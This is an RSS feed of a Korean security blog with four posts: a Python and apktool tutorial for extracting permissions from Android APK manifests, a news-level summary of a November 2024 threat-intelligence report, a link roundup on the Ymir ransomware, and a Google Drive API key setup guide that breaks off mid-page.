https://a2sembly.tistory.com/ 정보보안 블로그! ko Fri, 17 Apr 2026 04:38:19 +0900 TISTORY 100 a2sembly https://tistory1.daumcdn.net/tistory/4019789/attach/793cec959cbd412f90fbb45882663dc5 https://a2sembly.tistory.com https://a2sembly.tistory.com/70 <p data-ke-size="size16">악성 앱 분석에서 APK가 요구하는 권한을 파악하는 것은 중요합니다. 따라서, APK 파일을 디컴파일하고 AndroidManifest.xml을 분석하는 과정을 반드시 필요합니다. 이번 글에서는 Python과 apktool을 사용해 다수의 APK 파일을 디컴파하고, 앱이 요청하는 권한을 추출하는 방법을 단계별로 설명합니다.</p> <h2 data-ke-size="size26"><b>1. 필요한 도구 및 환경 설정</b> ️</h2> <p data-ke-size="size16">다음 도구와 라이브러리가 필요합니다:</p> <ol style="list-style-type: decimal;" data-ke-list-type="decimal"> <li><b>apktool</b>: APK를 디컴파일하는 데 사용되는 도구입니다. (<a><span>apktool</span><span> 다운로드</span></a>)</li> <li><b>Python 3.x</b>: 코드 실행을 위한 프로그래밍 언어</li> <li><b>Pip 설치</b><b></b></li> </ol> <pre id="code_1732022846093" class="python" data-ke-language="python" data-ke-type="codeblock"><code>pip install xml.etree.ElementTree</code></pre> <h2 data-ke-size="size26"><b>2. 코드 전체 흐름</b> </h2> <p data-ke-size="size16">아래는 코드의 주요 흐름입니다:</p> <ol style="list-style-type: decimal;" data-ke-list-type="decimal"> <li><b>APK 디컴파일:</b> apktool을 사용해 APK를 디컴파일합니다.</li> <li><b>AndroidManifest.xml 파일 찾기:</b> 디컴파일된 디렉토리에서 파일을 검색합니다.</li> <li><b>권한 분석:</b> AndroidManifest.xml에서 권한 정보를 읽고, 이를 JSON 형식으로 저장합니다.</li> </ol> <h2 data-ke-size="size26"><b>3. 핵심 코드 분석</b> </h2> <h4 data-ke-size="size20"><b>(1) APK 디컴파일 함수: decode_apk</b></h4> <p data-ke-size="size16">APK 파일을 디컴파일해 결과를 저장할 디렉토리를 생성합니다.</p> <pre id="code_1732022989257" class="python" data-ke-language="python" data-ke-type="codeblock"><code>def decode_apk(apk_path): output_dir = f"{apk_path}_decoded" if not os.path.exists(output_dir): call(f"java -jar apktool_2.9.3.jar d {apk_path} -o {output_dir}", shell=True) else: print(f"Directory {output_dir} already exists. Skipping decoding.") return output_dir</code></pre> <h4 data-ke-size="size20"><b>(2) AndroidManifest.xml 분석: parse_manifest</b></h4> <p data-ke-size="size16">AndroidManifest.xml 파일에서 패키지 이름과 권한을 추출합니다.</p> <pre id="code_1732023052554" class="python" data-ke-language="python" data-ke-type="codeblock"><code>def parse_manifest(file_path, permissions_dict): try: tree = ET.parse(file_path) root = tree.getroot() ns = {'android': '{http://schemas.android.com/apk/res/android}'} package_name = root.get('package', 'Unknown Package') permissions = root.findall(".//uses-permission", ns) extracted_permissions = [] for perm in permissions: perm_name = perm.get(f"{ns['android']}name") if perm_name: simple_name = perm_name.split('.')[-1] description = permissions_dict.get(simple_name, "No description available") extracted_permissions.append({"permission": simple_name, "description": description}) return package_name, extracted_permissions, file_path except ET.ParseError: return 'Unknown Package', [], file_path</code></pre> <h4 data-ke-size="size20"><b>(3) 코드 실행 결과</b> </h4> <pre id="code_1732023089197" class="python" data-ke-language="python" data-ke-type="codeblock"><code>{ "com.example.app": { "file_path": "Result/com.example.app/AndroidManifest.xml", "permissions": [ { "permission": "ACCESS_FINE_LOCATION", "description": "정확한 위치에 접근" }, { "permission": "READ_CONTACTS", "description": "연락처 읽기" } ] } }</code></pre> <h3 data-ke-size="size23"><b>Reference</b></h3> <p data-ke-size="size16">상세 코드는 아래 Github URL에서 확인할 수 있습니다.</p> <p data-ke-size="size16"><a href="https://github.com/a2sembly/AndroidManifest_Parser" target="_blank" rel="noopener&nbsp;noreferrer">https://github.com/a2sembly/AndroidManifest_Parser</a></p> <figure id="og_1732023144427" contenteditable="false" data-ke-type="opengraph" data-ke-align="alignCenter" data-og-type="object" data-og-title="GitHub - a2sembly/AndroidManifest_Parser" data-og-description="Contribute to a2sembly/AndroidManifest_Parser development by creating an account on GitHub." data-og-host="github.com" data-og-source-url="https://github.com/a2sembly/AndroidManifest_Parser" data-og-url="https://github.com/a2sembly/AndroidManifest_Parser" data-og-image="https://scrap.kakaocdn.net/dn/gnEUG/hyXzUgYVEK/cDvQNnUxBk94C3Sw264d30/img.png?width=1200&amp;height=600&amp;face=0_0_1200_600"><a href="https://github.com/a2sembly/AndroidManifest_Parser" target="_blank" rel="noopener" data-source-url="https://github.com/a2sembly/AndroidManifest_Parser"> <div class="og-image" style="background-image: url('https://scrap.kakaocdn.net/dn/gnEUG/hyXzUgYVEK/cDvQNnUxBk94C3Sw264d30/img.png?width=1200&amp;height=600&amp;face=0_0_1200_600');">&nbsp;</div> <div class="og-text"> <p class="og-title" data-ke-size="size16">GitHub - a2sembly/AndroidManifest_Parser</p> <p class="og-desc" data-ke-size="size16">Contribute to a2sembly/AndroidManifest_Parser development by creating an account on GitHub.</p> <p class="og-host" data-ke-size="size16">github.com</p> </div> </a></figure> <p data-ke-size="size16">&nbsp;</p> 공부/Programming Android androidmanifest apk decompile 악성 앱 악성 앱 분석 안드로이드 오블완 티스토리챌린지 파밍 피싱 해킹 a2sembly https://a2sembly.tistory.com/70 https://a2sembly.tistory.com/70#entry70comment Tue, 19 Nov 2024 22:33:07 +0900 https://a2sembly.tistory.com/69 <p data-ke-size="size16">최신 사이버 위협 동향과 관련된 연구를 간략히 요약합니다. 주요 사이버 공격 사례, 취약점, 위협 정보 및 관련 동향을 정리한 내용입니다.</p> <hr data-ke-style="style1" /> <h2 data-ke-size="size26"> 주요 공격 및 데이터 유출</h2> <h3 data-ke-size="size23">1. 메모리얼 병원 및 매너 랜섬웨어 공격</h3> <ul style="list-style-type: disc;" data-ke-list-type="disc"> <li><b> 위치:</b> 미국 조지아주 베인브리지</li> <li><b> 공격자:</b> Embargo 랜섬웨어 그룹</li> <li><b>⚠️ 결과:</b> 전자 의료 기록 시스템 접근 불가, 1.15TB의 데이터 유출 위협.</li> </ul> <h3 data-ke-size="size23">2. 영국 Serco 추적 시스템 사이버 공격</h3> <ul style="list-style-type: disc;" data-ke-list-type="disc"> <li><b> 영향:</b> 교도소 운송 차량 추적 시스템 및 비상 경보 비활성화.</li> <li><b> ️ 원인:</b> Microlise(소프트웨어 제공업체) 대상 공격.</li> </ul> <h3 data-ke-size="size23">3. ️ SelectBlinds 고객 정보 유출</h3> <ul style="list-style-type: disc;" data-ke-list-type="disc"> <li><b> 내용:</b> 약 20만 명의 개인 정보 및 결제 정보 도난.</li> <li><b> 기간:</b> 9개월 동안 웹사이트 체크아웃 페이지에 악성코드 삽입.</li> </ul> <hr data-ke-style="style1" /> <h2 data-ke-size="size26"> ️ 주요 취약점 및 패치</h2> <h3 data-ke-size="size23">1. Cisco URWB Access Points</h3> <ul style="list-style-type: disc;" data-ke-list-type="disc"> <li><b> 취약점 번호:</b> CVE-2024-20418</li> <li><b>⚡ 위험도:</b> CVSS 10.0 (심각)</li> <li><b> 내용:</b> 비인가 원격 공격자가 루트 권한으로 명령 실행 가능.</li> </ul> <h3 data-ke-size="size23">2. Aruba 네트워크 액세스 포인트</h3> <ul style="list-style-type: disc;" data-ke-list-type="disc"> <li><b> 취약점 번호:</b> CVE-2024-42509, CVE-2024-47460</li> <li><b> 내용:</b> UDP 포트 8211을 통해 비인가 명령 주입 공격 가능.</li> </ul> <h3 data-ke-size="size23">3. 안드로이드 보안 업데이트</h3> <ul style="list-style-type: disc;" data-ke-list-type="disc"> <li><b> 내용:</b> 두 가지 제로데이 취약점(CVE-2024-43093, CVE-2024-43047) 해결.</li> <li><b> ️ 영향:</b> 권한 상승 및 원격 코드 실행 방지.</li> </ul> <hr data-ke-style="style1" /> <h2 data-ke-size="size26"> 최신 위협 인텔리전스 보고</h2> <h3 data-ke-size="size23">1. Rhadamanthys 정보 탈취 캠페인</h3> <ul style="list-style-type: disc;" data-ke-list-type="disc"> <li><b> 캠페인 이름:</b> "CopyRh(ight)adamantys"</li> <li><b> 기법:</b> 저작권 침해 주제로 피싱 이메일 발송, 고전적인 머신러닝 기반 OCR 사용.</li> </ul> <h3 data-ke-size="size23">2. APT36의 ElizaRAT</h3> <ul style="list-style-type: disc;" data-ke-list-type="disc"> <li><b> 지역:</b> 인도 대상 공격</li> <li><b> ️ 특징:</b> Google Drive, Telegram 등 합법적인 클라우드 플랫폼을 활용한 C2 통신.</li> </ul> <h3 data-ke-size="size23">3. SteelFox 트로이목마</h3> <ul style="list-style-type: disc;" data-ke-list-type="disc"> <li><b> 내용:</b> 소프트웨어 활성화 툴로 위장해 정보 탈취 및 암호화폐 채굴 악성코드 배포.</li> </ul> <hr data-ke-style="style1" /> <h2 data-ke-size="size26"> 주요 사례 연구</h2> <h3 data-ke-size="size23">INC Ransomware</h3> <ul style="list-style-type: disc;" data-ke-list-type="disc"> <li><b> 산업:</b> 헬스케어 (북미 지역)</li> <li><b> ️ 기법:</b> AnyDesk, Mimikatz 등을 이용한 자격 증명 탈취 및 INC 랜섬웨어 실행.</li> </ul> <h3 data-ke-size="size23">COZY BEAR(APT29)의 Phishing Campaign</h3> <ul style="list-style-type: disc;" data-ke-list-type="disc"> <li><b> 지역:</b> 유럽 및 북미</li> <li><b> 내용:</b> 악성 RDP 파일을 통해 피해자의 로컬 시스템에 침입</li> </ul> <hr data-ke-style="style1" /> <h2 data-ke-size="size26"> 기타 동향</h2> <h3 data-ke-size="size23">2. 북한 연계 그룹</h3> <ul style="list-style-type: disc;" data-ke-list-type="disc"> <li><b> ️ Lazarus(APT38):</b> 멕시코 암호화폐 회사 대상 공격.</li> <li><b> ScarCruft(APT37):</b> Internet Explorer 취약점(CVE-2024-38178) 악용.</li> </ul> <hr data-ke-style="style1" /> <h2 data-ke-size="size26">Reference</h2> <p data-ke-size="size16"><a href="https://research.checkpoint.com/2024/11th-november-threat-intelligence-report/" target="_blank" rel="noopener&nbsp;noreferrer">https://research.checkpoint.com/2024/11th-november-threat-intelligence-report/</a></p> <figure id="og_1731853412613" contenteditable="false" data-ke-type="opengraph" data-ke-align="alignCenter" data-og-type="article" data-og-title="11th November &ndash; Threat Intelligence Report - Check Point Research" data-og-description="For the latest discoveries in cyber research for the week of 11th November, please download our Threat Intelligence Bulletin. TOP ATTACKS AND BREACHES Memorial Hospital and Manor in Bainbridge, Georgia, has been a victim of a ransomware attack that resulte" data-og-host="research.checkpoint.com" data-og-source-url="https://research.checkpoint.com/2024/11th-november-threat-intelligence-report/" data-og-url="https://research.checkpoint.com/2024/11th-november-threat-intelligence-report/" data-og-image="https://scrap.kakaocdn.net/dn/vD9TM/hyXzLcAFSS/4s0RYWr7r2XLUBATdVlyMK/img.jpg?width=1024&amp;height=512&amp;face=0_0_1024_512,https://scrap.kakaocdn.net/dn/er34PK/hyXzGWF62y/3lL1OZt04Gk7ssmKxqdDy0/img.jpg?width=1200&amp;height=628&amp;face=0_0_1200_628,https://scrap.kakaocdn.net/dn/b2ppW9/hyXwv9MOXk/ou9z8j81P5OCLrDk424HbK/img.jpg?width=1021&amp;height=580&amp;face=0_0_1021_580"><a href="https://research.checkpoint.com/2024/11th-november-threat-intelligence-report/" target="_blank" rel="noopener" data-source-url="https://research.checkpoint.com/2024/11th-november-threat-intelligence-report/"> <div class="og-image" style="background-image: url('https://scrap.kakaocdn.net/dn/vD9TM/hyXzLcAFSS/4s0RYWr7r2XLUBATdVlyMK/img.jpg?width=1024&amp;height=512&amp;face=0_0_1024_512,https://scrap.kakaocdn.net/dn/er34PK/hyXzGWF62y/3lL1OZt04Gk7ssmKxqdDy0/img.jpg?width=1200&amp;height=628&amp;face=0_0_1200_628,https://scrap.kakaocdn.net/dn/b2ppW9/hyXwv9MOXk/ou9z8j81P5OCLrDk424HbK/img.jpg?width=1021&amp;height=580&amp;face=0_0_1021_580');">&nbsp;</div> <div class="og-text"> <p class="og-title" data-ke-size="size16">11th November &ndash; Threat Intelligence Report - Check Point Research</p> <p class="og-desc" data-ke-size="size16">For the latest discoveries in cyber research for the week of 11th November, please download our Threat Intelligence Bulletin. TOP ATTACKS AND BREACHES Memorial Hospital and Manor in Bainbridge, Georgia, has been a victim of a ransomware attack that resulte</p> <p class="og-host" data-ke-size="size16">research.checkpoint.com</p> </div> </a></figure> <p data-ke-size="size16"><a href="https://www.bitdefender.com/en-us/blog/hotforsecurity/russian-hackers-ukrainian-rdp-phishing-aws" target="_blank" rel="noopener&nbsp;noreferrer">https://www.bitdefender.com/en-us/blog/hotforsecurity/russian-hackers-ukrainian-rdp-phishing-aws</a></p> <figure id="og_1731853427575" contenteditable="false" data-ke-type="opengraph" data-ke-align="alignCenter" data-og-type="website" data-og-title="Russian Hackers Target Ukrainian Military and Organizations with RDP Phishing Campaign" data-og-description="Hacking group Cozy Bear, working under Russia's Foreign Intelligence Service, targeted industry and military in Ukraine using fake AWS domains." data-og-host="www.bitdefender.com" data-og-source-url="https://www.bitdefender.com/en-us/blog/hotforsecurity/russian-hackers-ukrainian-rdp-phishing-aws" data-og-url="https://www.bitdefender.com/en-us/blog/hotforsecurity/russian-hackers-ukrainian-rdp-phishing-aws" data-og-image="https://scrap.kakaocdn.net/dn/bEqLVa/hyXzNVK3Sm/x2FqPgKFoc543VGKfxObLk/img.jpg?width=1920&amp;height=1280&amp;face=0_0_1920_1280,https://scrap.kakaocdn.net/dn/cATpSu/hyXzTuUsOc/LwvxSr9bapS0Sv0cHfPz30/img.jpg?width=1920&amp;height=1280&amp;face=0_0_1920_1280,https://scrap.kakaocdn.net/dn/cpU4j2/hyXzPTBlkl/eiopxRTPg1zFaNH3GA2GsK/img.jpg?width=600&amp;height=400&amp;face=0_0_600_400"><a href="https://www.bitdefender.com/en-us/blog/hotforsecurity/russian-hackers-ukrainian-rdp-phishing-aws" target="_blank" rel="noopener" data-source-url="https://www.bitdefender.com/en-us/blog/hotforsecurity/russian-hackers-ukrainian-rdp-phishing-aws"> <div class="og-image" style="background-image: url('https://scrap.kakaocdn.net/dn/bEqLVa/hyXzNVK3Sm/x2FqPgKFoc543VGKfxObLk/img.jpg?width=1920&amp;height=1280&amp;face=0_0_1920_1280,https://scrap.kakaocdn.net/dn/cATpSu/hyXzTuUsOc/LwvxSr9bapS0Sv0cHfPz30/img.jpg?width=1920&amp;height=1280&amp;face=0_0_1920_1280,https://scrap.kakaocdn.net/dn/cpU4j2/hyXzPTBlkl/eiopxRTPg1zFaNH3GA2GsK/img.jpg?width=600&amp;height=400&amp;face=0_0_600_400');">&nbsp;</div> <div class="og-text"> <p class="og-title" data-ke-size="size16">Russian Hackers Target Ukrainian Military and Organizations with RDP Phishing Campaign</p> <p class="og-desc" data-ke-size="size16">Hacking group Cozy Bear, working under Russia's Foreign Intelligence Service, targeted industry and military in Ukraine using fake AWS domains.</p> <p class="og-host" data-ke-size="size16">www.bitdefender.com</p> </div> </a></figure> <p data-ke-size="size16"><a href="https://www.picussecurity.com/resource/blog/understanding-and-mitigating-midnight-blizzards-rdp-based-spearphishing-campaign" target="_blank" rel="noopener&nbsp;noreferrer">https://www.picussecurity.com/resource/blog/understanding-and-mitigating-midnight-blizzards-rdp-based-spearphishing-campaign</a></p> <figure id="og_1731853442153" contenteditable="false" data-ke-type="opengraph" data-ke-align="alignCenter" data-og-type="article" data-og-title="Understanding and Mitigating Midnight Blizzard's RDP-Based Spear Phishing Campaign" data-og-description="Midnight Blizzard's spear-phishing campaign uses malicious RDP files to target sectors like government, defense, and academia. Learn about the attack and mitigation steps." data-og-host="www.picussecurity.com" data-og-source-url="https://www.picussecurity.com/resource/blog/understanding-and-mitigating-midnight-blizzards-rdp-based-spearphishing-campaign" data-og-url="https://www.picussecurity.com/resource/blog/understanding-and-mitigating-midnight-blizzards-rdp-based-spearphishing-campaign" data-og-image="https://scrap.kakaocdn.net/dn/cWeHeu/hyXzTuUsWY/kP3ZBwurSjYugLRb0LUqR0/img.png?width=835&amp;height=525&amp;face=302_39_350_91,https://scrap.kakaocdn.net/dn/sLLeV/hyXzNhbpWW/WAZPqF9q1MMJ5TCJ8W0LJ1/img.png?width=835&amp;height=525&amp;face=302_39_350_91,https://scrap.kakaocdn.net/dn/SocVE/hyXwuJ6VlS/yuPe1UULmeZRACfEULMLD0/img.png?width=572&amp;height=532&amp;face=0_0_572_532"><a href="https://www.picussecurity.com/resource/blog/understanding-and-mitigating-midnight-blizzards-rdp-based-spearphishing-campaign" target="_blank" rel="noopener" data-source-url="https://www.picussecurity.com/resource/blog/understanding-and-mitigating-midnight-blizzards-rdp-based-spearphishing-campaign"> <div class="og-image" style="background-image: url('https://scrap.kakaocdn.net/dn/cWeHeu/hyXzTuUsWY/kP3ZBwurSjYugLRb0LUqR0/img.png?width=835&amp;height=525&amp;face=302_39_350_91,https://scrap.kakaocdn.net/dn/sLLeV/hyXzNhbpWW/WAZPqF9q1MMJ5TCJ8W0LJ1/img.png?width=835&amp;height=525&amp;face=302_39_350_91,https://scrap.kakaocdn.net/dn/SocVE/hyXwuJ6VlS/yuPe1UULmeZRACfEULMLD0/img.png?width=572&amp;height=532&amp;face=0_0_572_532');">&nbsp;</div> <div class="og-text"> <p class="og-title" data-ke-size="size16">Understanding and Mitigating Midnight Blizzard's RDP-Based Spear Phishing Campaign</p> <p class="og-desc" data-ke-size="size16">Midnight Blizzard's spear-phishing campaign uses malicious RDP files to target sectors like government, defense, and academia. Learn about the attack and mitigation steps.</p> <p class="og-host" data-ke-size="size16">www.picussecurity.com</p> </div> </a></figure> <p data-ke-size="size16"><a href="https://research.checkpoint.com/2024/the-evolution-of-transparent-tribes-new-malware/" target="_blank" rel="noopener&nbsp;noreferrer">https://research.checkpoint.com/2024/the-evolution-of-transparent-tribes-new-malware/</a></p> <figure id="og_1731853892879" contenteditable="false" data-ke-type="opengraph" data-ke-align="alignCenter" data-og-type="article" data-og-title="Cloudy With a Chance of RATs: Unveiling APT36 and the Evolution of ElizaRAT - Check Point Research" data-og-description="Recent cyber attacks by Transparent Tribe, or APT36, utilize increasingly sophisticated malware called ElizaRAT" data-og-host="research.checkpoint.com" data-og-source-url="https://research.checkpoint.com/2024/the-evolution-of-transparent-tribes-new-malware/" data-og-url="https://research.checkpoint.com/2024/the-evolution-of-transparent-tribes-new-malware/" data-og-image="https://scrap.kakaocdn.net/dn/692fM/hyXzRRp3r0/eykNZWZAIGJmgrXTkcKPlk/img.jpg?width=1600&amp;height=917&amp;face=0_0_1600_917,https://scrap.kakaocdn.net/dn/IjDbR/hyXzT9xhiR/YBh6xSF4xUxYLDEKWLqol0/img.jpg?width=1600&amp;height=917&amp;face=0_0_1600_917,https://scrap.kakaocdn.net/dn/jKd3V/hyXzTuUzA5/OBaVXK3dlJMmQThYB0ckM0/img.png?width=813&amp;height=340&amp;face=0_0_813_340"><a href="https://research.checkpoint.com/2024/the-evolution-of-transparent-tribes-new-malware/" target="_blank" rel="noopener" data-source-url="https://research.checkpoint.com/2024/the-evolution-of-transparent-tribes-new-malware/"> <div class="og-image" style="background-image: url('https://scrap.kakaocdn.net/dn/692fM/hyXzRRp3r0/eykNZWZAIGJmgrXTkcKPlk/img.jpg?width=1600&amp;height=917&amp;face=0_0_1600_917,https://scrap.kakaocdn.net/dn/IjDbR/hyXzT9xhiR/YBh6xSF4xUxYLDEKWLqol0/img.jpg?width=1600&amp;height=917&amp;face=0_0_1600_917,https://scrap.kakaocdn.net/dn/jKd3V/hyXzTuUzA5/OBaVXK3dlJMmQThYB0ckM0/img.png?width=813&amp;height=340&amp;face=0_0_813_340');">&nbsp;</div> <div class="og-text"> <p class="og-title" data-ke-size="size16">Cloudy With a Chance of RATs: Unveiling APT36 and the Evolution of ElizaRAT - Check Point Research</p> <p class="og-desc" data-ke-size="size16">Recent cyber attacks by Transparent Tribe, or APT36, utilize increasingly sophisticated malware called ElizaRAT</p> <p class="og-host" data-ke-size="size16">research.checkpoint.com</p> </div> </a></figure> <p data-ke-size="size16">&nbsp;</p> Threat Intelligence threat intelligence 공격자 사이버 위협 오블완 위협정보 정보보안 정보보호 티스토리챌린지 해킹 a2sembly https://a2sembly.tistory.com/69 https://a2sembly.tistory.com/69#entry69comment Sun, 17 Nov 2024 23:37:44 +0900 https://a2sembly.tistory.com/68 <p data-ke-size="size16"><a href="https://www.boannews.com/media/view.asp?idx=134374&amp;page=1&amp;kind=1" target="_blank" rel="noopener&nbsp;noreferrer">https://www.boannews.com/media/view.asp?idx=134374&amp;page=1&amp;kind=1</a></p> <figure id="og_1731756134612" contenteditable="false" data-ke-type="opengraph" data-ke-align="alignCenter" data-og-type="article" data-og-title="대단히 은밀하고 비밀스러운 랜섬웨어 이미르, 타 조직과 파트너십 맺고 움직여" data-og-description="새로운 랜섬웨어가 등장했다. 이름은 이미르(Ymir)로, 여러 가지 독특한 기능을 가지고 있어 관심을 끌고 있다. 이미르를 사용하는 공격자들은 먼저 파워셸을 통해 피해자의 시스템에 접근하여 " data-og-host="www.boannews.com" data-og-source-url="https://www.boannews.com/media/view.asp?idx=134374&amp;page=1&amp;kind=1" data-og-url="http://www.boannews.com/media/view.asp?idx=134374" data-og-image="https://scrap.kakaocdn.net/dn/bUp3A9/hyXwoJSMMS/ULqTikIPMrRpLaocHOazlk/img.jpg?width=750&amp;height=500&amp;face=0_0_750_500"><a href="https://www.boannews.com/media/view.asp?idx=134374&amp;page=1&amp;kind=1" target="_blank" rel="noopener" data-source-url="https://www.boannews.com/media/view.asp?idx=134374&amp;page=1&amp;kind=1"> <div class="og-image" style="background-image: url('https://scrap.kakaocdn.net/dn/bUp3A9/hyXwoJSMMS/ULqTikIPMrRpLaocHOazlk/img.jpg?width=750&amp;height=500&amp;face=0_0_750_500');">&nbsp;</div> <div class="og-text"> <p class="og-title" data-ke-size="size16">대단히 은밀하고 비밀스러운 랜섬웨어 이미르, 타 조직과 파트너십 맺고 움직여</p> <p class="og-desc" data-ke-size="size16">새로운 랜섬웨어가 등장했다. 이름은 이미르(Ymir)로, 여러 가지 독특한 기능을 가지고 있어 관심을 끌고 있다. 이미르를 사용하는 공격자들은 먼저 파워셸을 통해 피해자의 시스템에 접근하여</p> <p class="og-host" data-ke-size="size16">www.boannews.com</p> </div> </a></figure> <p data-ke-size="size16"><a href="https://thehackernews.com/2024/11/new-ymir-ransomware-exploits-memory-for.html" target="_blank" rel="noopener&nbsp;noreferrer">https://thehackernews.com/2024/11/new-ymir-ransomware-exploits-memory-for.html</a></p> <p data-ke-size="size16">&nbsp;</p> <p data-ke-size="size16"><a href="https://www.kaspersky.com/about/press-releases/kaspersky-identifies-new-stealthy-ransomware" target="_blank" rel="noopener&nbsp;noreferrer">https://www.kaspersky.com/about/press-releases/kaspersky-identifies-new-stealthy-ransomware</a></p> <figure id="og_1731756147995" contenteditable="false" data-ke-type="opengraph" data-ke-align="alignCenter" data-og-type="article" data-og-title="Kaspersky identifies new stealthy ransomware" data-og-description="Kaspersky&rsquo;s Global Emergency Response Team has identified a previously unseen ransomware strain in active use, deployed in an attack following the theft of employee credentials. The ransomware, dubbed &ldquo;Ymir&rdquo;, employs advanced stealth and encryption m" data-og-host="www.kaspersky.com" data-og-source-url="https://www.kaspersky.com/about/press-releases/kaspersky-identifies-new-stealthy-ransomware" data-og-url="https://www.kaspersky.com/about/press-releases/kaspersky-identifies-new-stealthy-ransomware" data-og-image=""><a href="https://www.kaspersky.com/about/press-releases/kaspersky-identifies-new-stealthy-ransomware" target="_blank" rel="noopener" data-source-url="https://www.kaspersky.com/about/press-releases/kaspersky-identifies-new-stealthy-ransomware"> <div class="og-image" style="background-image: url();">&nbsp;</div> <div class="og-text"> <p class="og-title" data-ke-size="size16">Kaspersky identifies new stealthy ransomware</p> <p class="og-desc" data-ke-size="size16">Kaspersky&rsquo;s Global Emergency Response Team has identified a previously unseen ransomware strain in active use, deployed in an attack following the theft of employee credentials. The ransomware, dubbed &ldquo;Ymir&rdquo;, employs advanced stealth and encryption m</p> <p class="og-host" data-ke-size="size16">www.kaspersky.com</p> </div> </a></figure> <p data-ke-size="size16">&nbsp;</p> <p data-ke-size="size16">&nbsp;</p> 스크랩 ymir 오블완 이미르 티스토리챌린지 a2sembly https://a2sembly.tistory.com/68 https://a2sembly.tistory.com/68#entry68comment Sat, 16 Nov 2024 20:22:58 +0900 https://a2sembly.tistory.com/67 <h2 data-ke-size="size26">0. 프로젝트 생성</h2> <ul style="list-style-type: disc;" data-ke-list-type="disc"> <li>만약 프로젝트가 없다면 프로젝트를 생성합니다.</li> </ul> <p><figure class="imageblock alignCenter" data-ke-mobileStyle="widthOrigin" data-origin-width="616" data-origin-height="477"><span data-url="https://blog.kakaocdn.net/dn/bnLbkK/btsKIO14j9S/wMIo4eidCxyIMOaWT9rFgK/img.png" data-phocus="https://blog.kakaocdn.net/dn/bnLbkK/btsKIO14j9S/wMIo4eidCxyIMOaWT9rFgK/img.png"><img src="https://blog.kakaocdn.net/dn/bnLbkK/btsKIO14j9S/wMIo4eidCxyIMOaWT9rFgK/img.png" srcset="https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbnLbkK%2FbtsKIO14j9S%2FwMIo4eidCxyIMOaWT9rFgK%2Fimg.png" onerror="this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';" loading="lazy" width="616" height="477" data-origin-width="616" data-origin-height="477"/></span></figure> </p> <h2 data-ke-size="size26">1. Key 발급</h2> <ul style="list-style-type: disc;" data-ke-list-type="disc"> <li><a href="https://console.cloud.google.com/hom">https://console.cloud.google.com/home</a> 에 접속한다.</li> </ul> <p><figure class="imageblock alignCenter" data-ke-mobileStyle="widthOrigin" data-origin-width="494" data-origin-height="425"><span data-url="https://blog.kakaocdn.net/dn/umj8y/btsKKfc5WH8/yW7I2PluGIsXppqTQ3NqsK/img.png" data-phocus="https://blog.kakaocdn.net/dn/umj8y/btsKKfc5WH8/yW7I2PluGIsXppqTQ3NqsK/img.png"><img src="https://blog.kakaocdn.net/dn/umj8y/btsKKfc5WH8/yW7I2PluGIsXppqTQ3NqsK/img.png" srcset="https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fumj8y%2FbtsKKfc5WH8%2FyW7I2PluGIsXppqTQ3NqsK%2Fimg.png" onerror="this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';" loading="lazy" width="494" height="425" data-origin-width="494" data-origin-height="425"/></span></figure> </p> <ul style="list-style-type: disc;" data-ke-list-type="disc"> <li>그런 다음 API 개요로 이동한다.</li> <li>왼쪽 메뉴에 라이브러리로 이동</li> </ul> <p><figure class="imageblock alignCenter" data-ke-mobileStyle="widthOrigin" data-origin-width="183" data-origin-height="308"><span data-url="https://blog.kakaocdn.net/dn/JQ3jq/btsKJLwIJQp/o2UDWDWWkZmwfKfs3qGOyK/img.png" data-phocus="https://blog.kakaocdn.net/dn/JQ3jq/btsKJLwIJQp/o2UDWDWWkZmwfKfs3qGOyK/img.png"><img src="https://blog.kakaocdn.net/dn/JQ3jq/btsKJLwIJQp/o2UDWDWWkZmwfKfs3qGOyK/img.png" srcset="https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FJQ3jq%2FbtsKJLwIJQp%2Fo2UDWDWWkZmwfKfs3qGOyK%2Fimg.png" onerror="this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';" loading="lazy" width="183" height="308" data-origin-width="183" data-origin-height="308"/></span></figure> </p> <ul style="list-style-type: disc;" data-ke-list-type="disc"> <li>그런 다음 Google Drive API를 검색하여 설치한다.</li> </ul> <p><figure class="imageblock alignCenter" data-ke-mobileStyle="widthOrigin" data-origin-width="1165" data-origin-height="343"><span data-url="https://blog.kakaocdn.net/dn/kYX14/btsKIDTWrcT/02HMpROQD8GysIvLMYGiRk/img.png" data-phocus="https://blog.kakaocdn.net/dn/kYX14/btsKIDTWrcT/02HMpROQD8GysIvLMYGiRk/img.png"><img src="https://blog.kakaocdn.net/dn/kYX14/btsKIDTWrcT/02HMpROQD8GysIvLMYGiRk/img.png" srcset="https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FkYX14%2FbtsKIDTWrcT%2F02HMpROQD8GysIvLMYGiRk%2Fimg.png" onerror="this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';" loading="lazy" width="1165" height="343" data-origin-width="1165" data-origin-height="343"/></span></figure> </p> <ul style="list-style-type: disc;" data-ke-list-type="disc"> <li>설치가 완료되었으면 관리로 들어간다.</li> </ul> <p><figure class="imageblock alignCenter" data-ke-mobileStyle="widthOrigin" data-origin-width="692" data-origin-height="238"><span data-url="https://blog.kakaocdn.net/dn/bf0hF8/btsKJxZPyIu/0QdrFdT7gHFMVLHv40vaPk/img.png" data-phocus="https://blog.kakaocdn.net/dn/bf0hF8/btsKJxZPyIu/0QdrFdT7gHFMVLHv40vaPk/img.png"><img src="https://blog.kakaocdn.net/dn/bf0hF8/btsKJxZPyIu/0QdrFdT7gHFMVLHv40vaPk/img.png" 